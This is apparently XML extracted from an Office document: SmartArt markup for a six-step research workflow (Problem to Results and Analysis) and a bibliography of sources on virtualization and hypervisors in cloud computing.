          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3E7A33D7-BE0F-4813-B488-D58BA4303E94}" type="pres">
      <dgm:prSet presAssocID="{19F5D607-CDFB-47BB-B28E-30F2D86C006A}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7B27C0D8-E7C0-4133-9B91-DCE1B7E56DD4}" type="pres">
      <dgm:prSet presAssocID="{348D7A13-5842-4855-B4E6-4495CBE6D7AD}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A9EE45B8-D7BA-4416-84F2-24896977BAE7}" type="pres">
      <dgm:prSet presAssocID="{348D7A13-5842-4855-B4E6-4495CBE6D7AD}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3BCD766E-19D8-4BFD-BD2B-55E8E8536819}" type="pres">
      <dgm:prSet presAssocID="{36A8581C-DB10-411F-80F1-536F815DDE9A}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{036FACE9-6AE5-49DC-B823-A5B639927F61}" type="pres">
      <dgm:prSet presAssocID="{9A3660C9-8080-4BBC-9E44-8C2CD78A600B}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4C6A6275-C83F-4951-AA80-75AD1D5B9FEE}" type="pres">
      <dgm:prSet presAssocID="{9A3660C9-8080-4BBC-9E44-8C2CD78A600B}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{095757D9-6BC1-424C-9613-A0A3C779D724}" type="pres">
      <dgm:prSet presAssocID="{CD1B59A4-A9D8-4A8C-947F-AA66897EB227}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17C1A79B-A36D-4BAB-9229-33554AB11DCB}" type="pres">
      <dgm:prSet presAssocID="{BDEDB8DA-4199-4766-A6E3-546557C5B9E0}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5303268E-7D59-4A7A-8C7C-2D5FD6729AA5}" type="pres">
      <dgm:prSet presAssocID="{BDEDB8DA-4199-4766-A6E3-546557C5B9E0}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{61F8A97A-8EFE-4791-93DC-265D8F69A7D7}" type="pres">
      <dgm:prSet presAssocID="{6469249C-81D8-4836-934D-C332C1C6F024}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6" custLinFactNeighborX="0">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0FBDCADF-5C86-4ED6-805C-66B56FA9E628}" type="pres">
      <dgm:prSet presAssocID="{D6655E3B-9FFC-4728-82B6-6B903B87E864}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{86BD856A-442B-4D15-A306-1AC68025717F}" type="pres">
      <dgm:prSet presAssocID="{D6655E3B-9FFC-4728-82B6-6B903B87E864}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7A5C4424-5AE1-42B9-88C8-81D431694FE7}" type="pres">
      <dgm:prSet presAssocID="{765EB1E6-40D9-40C2-998F-271D5882EE9D}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F204E721-35D3-4F49-989D-2662B05D6820}" type="pres">
      <dgm:prSet presAssocID="{F12D2D8D-6AA9-4DAE-83D7-F42B29499A52}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{15870935-550A-4B26-88D9-4EED8DCD16B0}" type="pres">
      <dgm:prSet presAssocID="{F12D2D8D-6AA9-4DAE-83D7-F42B29499A52}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{85DF9015-9355-404F-BA69-DD803B5CAA0B}" type="pres">
      <dgm:prSet presAssocID="{85C8D134-DC2D-4244-97E3-B1BC8ACEB8AF}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{DE98FD04-E311-4CF4-A3FF-6E53A1B3FC1D}" srcId="{24BDE88D-E8DD-4E00-AB3E-69282B04F15C}" destId="{765EB1E6-40D9-40C2-998F-271D5882EE9D}" srcOrd="4" destOrd="0" parTransId="{2C985C1F-55CA-44F1-BBEF-465145911776}" sibTransId="{F12D2D8D-6AA9-4DAE-83D7-F42B29499A52}"/>
    <dgm:cxn modelId="{1EFE1F11-4704-4E2E-A55E-CCE65FF4B67D}" type="presOf" srcId="{CD1B59A4-A9D8-4A8C-947F-AA66897EB227}" destId="{095757D9-6BC1-424C-9613-A0A3C779D724}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{4CBBF615-E2B2-45C5-A26B-E291D829630D}" srcId="{24BDE88D-E8DD-4E00-AB3E-69282B04F15C}" destId="{85C8D134-DC2D-4244-97E3-B1BC8ACEB8AF}" srcOrd="5" destOrd="0" parTransId="{ACA1EC92-337C-444F-9375-F252DC8BCD5A}" sibTransId="{22F9C113-1ADB-49C2-A458-25A554662C96}"/>
    <dgm:cxn modelId="{96B73C17-D1AB-4C13-AD64-5FD4D3E6A377}" srcId="{24BDE88D-E8DD-4E00-AB3E-69282B04F15C}" destId="{CD1B59A4-A9D8-4A8C-947F-AA66897EB227}" srcOrd="2" destOrd="0" parTransId="{D91C1282-FD87-452E-9E1C-7DD41228EBA1}" sibTransId="{BDEDB8DA-4199-4766-A6E3-546557C5B9E0}"/>
    <dgm:cxn modelId="{98A4D118-2E22-4317-AD14-64AC8C4AD20D}" type="presOf" srcId="{6469249C-81D8-4836-934D-C332C1C6F024}" destId="{61F8A97A-8EFE-4791-93DC-265D8F69A7D7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{0C203719-9DDE-4238-A27A-0933713BF5CC}" type="presOf" srcId="{85C8D134-DC2D-4244-97E3-B1BC8ACEB8AF}" destId="{85DF9015-9355-404F-BA69-DD803B5CAA0B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{34E2D31B-1A7F-4E98-ABDB-A9F94B6A7CB4}" type="presOf" srcId="{19F5D607-CDFB-47BB-B28E-30F2D86C006A}" destId="{3E7A33D7-BE0F-4813-B488-D58BA4303E94}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{A8264821-32CC-4254-957B-CD0D6FE8E812}" type="presOf" srcId="{36A8581C-DB10-411F-80F1-536F815DDE9A}" destId="{3BCD766E-19D8-4BFD-BD2B-55E8E8536819}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{374FC228-0628-441F-9E1A-EBEAB218C413}" type="presOf" srcId="{D6655E3B-9FFC-4728-82B6-6B903B87E864}" destId="{0FBDCADF-5C86-4ED6-805C-66B56FA9E628}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{56432434-916C-4650-8FCE-790E323AFAD3}" type="presOf" srcId="{BDEDB8DA-4199-4766-A6E3-546557C5B9E0}" destId="{5303268E-7D59-4A7A-8C7C-2D5FD6729AA5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{3E2B3A60-2046-404E-97DD-662BBD8CE424}" srcId="{24BDE88D-E8DD-4E00-AB3E-69282B04F15C}" destId="{19F5D607-CDFB-47BB-B28E-30F2D86C006A}" srcOrd="0" destOrd="0" parTransId="{8FE0EE7E-626F-4C9B-BD1E-5793A66A46A5}" sibTransId="{348D7A13-5842-4855-B4E6-4495CBE6D7AD}"/>
    <dgm:cxn modelId="{0FF00045-A66F-4582-A6C0-1343D268479B}" srcId="{24BDE88D-E8DD-4E00-AB3E-69282B04F15C}" destId="{6469249C-81D8-4836-934D-C332C1C6F024}" srcOrd="3" destOrd="0" parTransId="{8680615F-7CAC-40BE-9CAD-72A1D845F295}" sibTransId="{D6655E3B-9FFC-4728-82B6-6B903B87E864}"/>
    <dgm:cxn modelId="{B04BF947-E6D2-4D33-9946-9122B7232C5F}" type="presOf" srcId="{9A3660C9-8080-4BBC-9E44-8C2CD78A600B}" destId="{036FACE9-6AE5-49DC-B823-A5B639927F61}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{C3FB0977-5079-4804-8B9B-8C3F5F3E819F}" type="presOf" srcId="{765EB1E6-40D9-40C2-998F-271D5882EE9D}" destId="{7A5C4424-5AE1-42B9-88C8-81D431694FE7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{BDBC5796-12DF-48A3-9420-789183F21814}" type="presOf" srcId="{BDEDB8DA-4199-4766-A6E3-546557C5B9E0}" destId="{17C1A79B-A36D-4BAB-9229-33554AB11DCB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{D4818C98-57DB-461E-9983-5E1CF95FC63A}" type="presOf" srcId="{348D7A13-5842-4855-B4E6-4495CBE6D7AD}" destId="{A9EE45B8-D7BA-4416-84F2-24896977BAE7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{D3EB82B0-AEA1-445E-849B-CF83D51C169F}" type="presOf" srcId="{24BDE88D-E8DD-4E00-AB3E-69282B04F15C}" destId="{9344BC7A-80D3-414F-AC3A-CFC702F0B560}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{E81161C1-5910-4AFB-9A73-EF11828ED8C6}" type="presOf" srcId="{F12D2D8D-6AA9-4DAE-83D7-F42B29499A52}" destId="{15870935-550A-4B26-88D9-4EED8DCD16B0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{CE2845C3-A513-4BA8-8643-D7BA0BAA611E}" type="presOf" srcId="{348D7A13-5842-4855-B4E6-4495CBE6D7AD}" destId="{7B27C0D8-E7C0-4133-9B91-DCE1B7E56DD4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{EC332EC9-92F2-467A-A396-8623691250C5}" type="presOf" srcId="{F12D2D8D-6AA9-4DAE-83D7-F42B29499A52}" destId="{F204E721-35D3-4F49-989D-2662B05D6820}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{C2EC44CC-B558-40AC-A39E-C2C20DAC91D7}" type="presOf" srcId="{9A3660C9-8080-4BBC-9E44-8C2CD78A600B}" destId="{4C6A6275-C83F-4951-AA80-75AD1D5B9FEE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{AB3D1ECF-5939-4B37-9D06-CC6DF3BE0334}" srcId="{24BDE88D-E8DD-4E00-AB3E-69282B04F15C}" destId="{36A8581C-DB10-411F-80F1-536F815DDE9A}" srcOrd="1" destOrd="0" parTransId="{0DFD6834-F926-465E-97C0-FC0A89A0B2CB}" sibTransId="{9A3660C9-8080-4BBC-9E44-8C2CD78A600B}"/>
    <dgm:cxn modelId="{61C3ECF4-7B35-4C49-9621-FEA88799968E}" type="presOf" srcId="{D6655E3B-9FFC-4728-82B6-6B903B87E864}" destId="{86BD856A-442B-4D15-A306-1AC68025717F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{E4DA8B5B-71F0-44AC-B4FC-36D467D00401}" type="presParOf" srcId="{9344BC7A-80D3-414F-AC3A-CFC702F0B560}" destId="{3E7A33D7-BE0F-4813-B488-D58BA4303E94}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{7782C27A-4568-4C53-80AD-9180EC50BE4A}" type="presParOf" srcId="{9344BC7A-80D3-414F-AC3A-CFC702F0B560}" destId="{7B27C0D8-E7C0-4133-9B91-DCE1B7E56DD4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{AA8DEE77-633A-49D8-97BC-4EB9BAF4DB67}" type="presParOf" srcId="{7B27C0D8-E7C0-4133-9B91-DCE1B7E56DD4}" destId="{A9EE45B8-D7BA-4416-84F2-24896977BAE7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{900B0674-9F1A-47E6-B8FA-2340348BEE20}" type="presParOf" srcId="{9344BC7A-80D3-414F-AC3A-CFC702F0B560}" destId="{3BCD766E-19D8-4BFD-BD2B-55E8E8536819}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{98DB0502-1229-44F6-B2AE-FD92AB2690F5}" type="presParOf" srcId="{9344BC7A-80D3-414F-AC3A-CFC702F0B560}" destId="{036FACE9-6AE5-49DC-B823-A5B639927F61}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{81AA9780-2891-49E4-B226-AB50D20D1EEB}" type="presParOf" srcId="{036FACE9-6AE5-49DC-B823-A5B639927F61}" destId="{4C6A6275-C83F-4951-AA80-75AD1D5B9FEE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{A8FE104C-4BD1-4956-8AC5-7626D2DB66AD}" type="presParOf" srcId="{9344BC7A-80D3-414F-AC3A-CFC702F0B560}" destId="{095757D9-6BC1-424C-9613-A0A3C779D724}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{0095C582-0BBB-4CA1-9EE8-1539446FD4E1}" type="presParOf" srcId="{9344BC7A-80D3-414F-AC3A-CFC702F0B560}" destId="{17C1A79B-A36D-4BAB-9229-33554AB11DCB}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{753C284B-6DB3-472D-94A8-8B6D74757EE0}" type="presParOf" srcId="{17C1A79B-A36D-4BAB-9229-33554AB11DCB}" destId="{5303268E-7D59-4A7A-8C7C-2D5FD6729AA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{B4E81CF3-BF5C-43AD-9647-F1ED1F6090DF}" type="presParOf" srcId="{9344BC7A-80D3-414F-AC3A-CFC702F0B560}" destId="{61F8A97A-8EFE-4791-93DC-265D8F69A7D7}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{80B19A90-C7C7-4D56-BEED-F65932C1F521}" type="presParOf" srcId="{9344BC7A-80D3-414F-AC3A-CFC702F0B560}" destId="{0FBDCADF-5C86-4ED6-805C-66B56FA9E628}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{18C745AC-4784-44FC-85B3-578AD01A6027}" type="presParOf" srcId="{0FBDCADF-5C86-4ED6-805C-66B56FA9E628}" destId="{86BD856A-442B-4D15-A306-1AC68025717F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{39E66461-14B0-4511-A2E9-E1A774BA9B48}" type="presParOf" srcId="{9344BC7A-80D3-414F-AC3A-CFC702F0B560}" destId="{7A5C4424-5AE1-42B9-88C8-81D431694FE7}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{6B03387B-69E0-4A94-871C-AD8A832DD287}" type="presParOf" srcId="{9344BC7A-80D3-414F-AC3A-CFC702F0B560}" destId="{F204E721-35D3-4F49-989D-2662B05D6820}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{41587BA6-AEC3-4FA5-8858-C3BEF4462B95}" type="presParOf" srcId="{F204E721-35D3-4F49-989D-2662B05D6820}" destId="{15870935-550A-4B26-88D9-4EED8DCD16B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess3"/>
    <dgm:cxn modelId="{61D0DB83-8184-447E-B0E9-F87F679E3ABB}" type="presParOf" srcId="{9344BC7A-80D3-414F-AC3A-CFC702F0B560}" destId="{85DF9015-9355-404F-BA69-DD803B5CAA0B}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/b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27C0D8-E7C0-4133-9B91-DCE1B7E56DD4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1278808" y="341810"/>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1403043" y="386061"/>
        <a:ext cx="14687" cy="2937"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3E7A33D7-BE0F-4813-B488-D58BA4303E94}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3392"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Problem</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3392" y="4366"/>
        <a:ext cx="1277215" cy="766329"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{036FACE9-6AE5-49DC-B823-A5B639927F61}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2849782" y="341810"/>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974018" y="386061"/>
        <a:ext cx="14687" cy="2937"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3BCD766E-19D8-4BFD-BD2B-55E8E8536819}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1574367"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Literature Review</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1574367" y="4366"/>
        <a:ext cx="1277215" cy="766329"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17C1A79B-A36D-4BAB-9229-33554AB11DCB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="642000" y="768895"/>
          <a:ext cx="3141949" cy="263159"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="3141949" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="3141949" y="148679"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="148679"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="263159"/>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134083" y="899006"/>
        <a:ext cx="157782" cy="2937"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{095757D9-6BC1-424C-9613-A0A3C779D724}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3145341"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Method </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3145341" y="4366"/>
        <a:ext cx="1277215" cy="766329"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0FBDCADF-5C86-4ED6-805C-66B56FA9E628}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1278808" y="1401899"/>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1403043" y="1446150"/>
        <a:ext cx="14687" cy="2937"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{61F8A97A-8EFE-4791-93DC-265D8F69A7D7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3392"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Implementation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3392" y="1064454"/>
        <a:ext cx="1277215" cy="766329"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F204E721-35D3-4F49-989D-2662B05D6820}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2849782" y="1401899"/>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974018" y="1446150"/>
        <a:ext cx="14687" cy="2937"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7A5C4424-5AE1-42B9-88C8-81D431694FE7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1574367"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Testing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1574367" y="1064454"/>
        <a:ext cx="1277215" cy="766329"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{85DF9015-9355-404F-BA69-DD803B5CAA0B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3145341"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Results and Analysis</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3145341" y="1064454"/>
        <a:ext cx="1277215" cy="76632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433706-CCF6-4478-B625-4BDD9B348D4E}">
  <we:reference id="f78a3046-9e99-4300-aa2b-5814002b01a2" version="1.28.0.0" store="EXCatalog" storeType="EXCatalog"/>
  <we:alternateReferences>
    <we:reference id="WA104382081" version="1.28.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RKu15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{28F88A96-96B1-4329-94EE-3859CC6E0A49}</b:Guid>
    <b:Title>An Importance of Using Virtualization Technology in Cloud Computing</b:Title>
    <b:Year>2015</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Kumar</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Charu</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Global Journal of Computers &amp; Technology</b:JournalName>
    <b:Pages>56-60</b:Pages>
    <b:Volume>1</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SMo19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{E9094572-6420-478E-9274-1F62AABFBAB9}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mondesire</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Angelopoulou</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Sirigampola</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>et.al</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Combining Virtualization and Containerization to support interactive games and simulations on the cloud</b:Title>
    <b:JournalName>Simulation Modelling Practice and Theory</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages>233-244</b:Pages>
    <b:Volume>93</b:Volume>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Đor21</b:Tag>
    <b:SourceType>ConferenceProceedings</b:SourceType>
    <b:Guid>{30223733-31D9-4F5F-82FE-292C7C4847CA}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Đorđević</b:Last>
            <b:First>B</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Timčenko</b:Last>
            <b:First>V</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Nikolić</b:Last>
            <b:First>E</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Davidović</b:Last>
            <b:First>N</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Comparing Performances of Native Host and Virtualization on ESXi hypervisor</b:Title>
    <b:Year>2021</b:Year>
    <b:ConferenceName>20th International Symposium INFOTEH-JAHORINA (INFOTEH)</b:ConferenceName>
    <b:City>East Sarajevo</b:City>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SRP17</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{73C4FDB3-298C-413B-9AD2-158EEA4D86B6}</b:Guid>
    <b:Title>Performance Benchmarking of Hypervisors - A Case Study</b:Title>
    <b:Year>2017</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Poojara</b:Last>
            <b:First>S</b:First>
            <b:Middle>R.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Dharwadkar</b:Last>
            <b:First>N</b:First>
            <b:Middle>V.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Ghule</b:Last>
            <b:First>V</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Indian Journal of Science and Technology</b:JournalName>
    <b:Pages>1-11</b:Pages>
    <b:Volume>10</b:Volume>
    <b:Issue>44</b:Issue>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ABh21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{84AE415C-0D29-470D-99AF-A3D3E5798830}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Bhardwaj</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Krishna</b:Last>
            <b:First>C</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Virtualization in Cloud Computing: Moving from Hypervisor to Containerization—A Survey</b:Title>
    <b:JournalName>Arabian Journal for science and Engineering</b:JournalName>
    <b:Year>2021</b:Year>
    <b:Pages>1-17</b:Pages>
    <b:Volume>2</b:Volume>
    <b:Issue>3</b:Issue>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>GRa19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{00482553-672A-46DF-93BE-3541F3383906}</b:Guid>
    <b:Author>
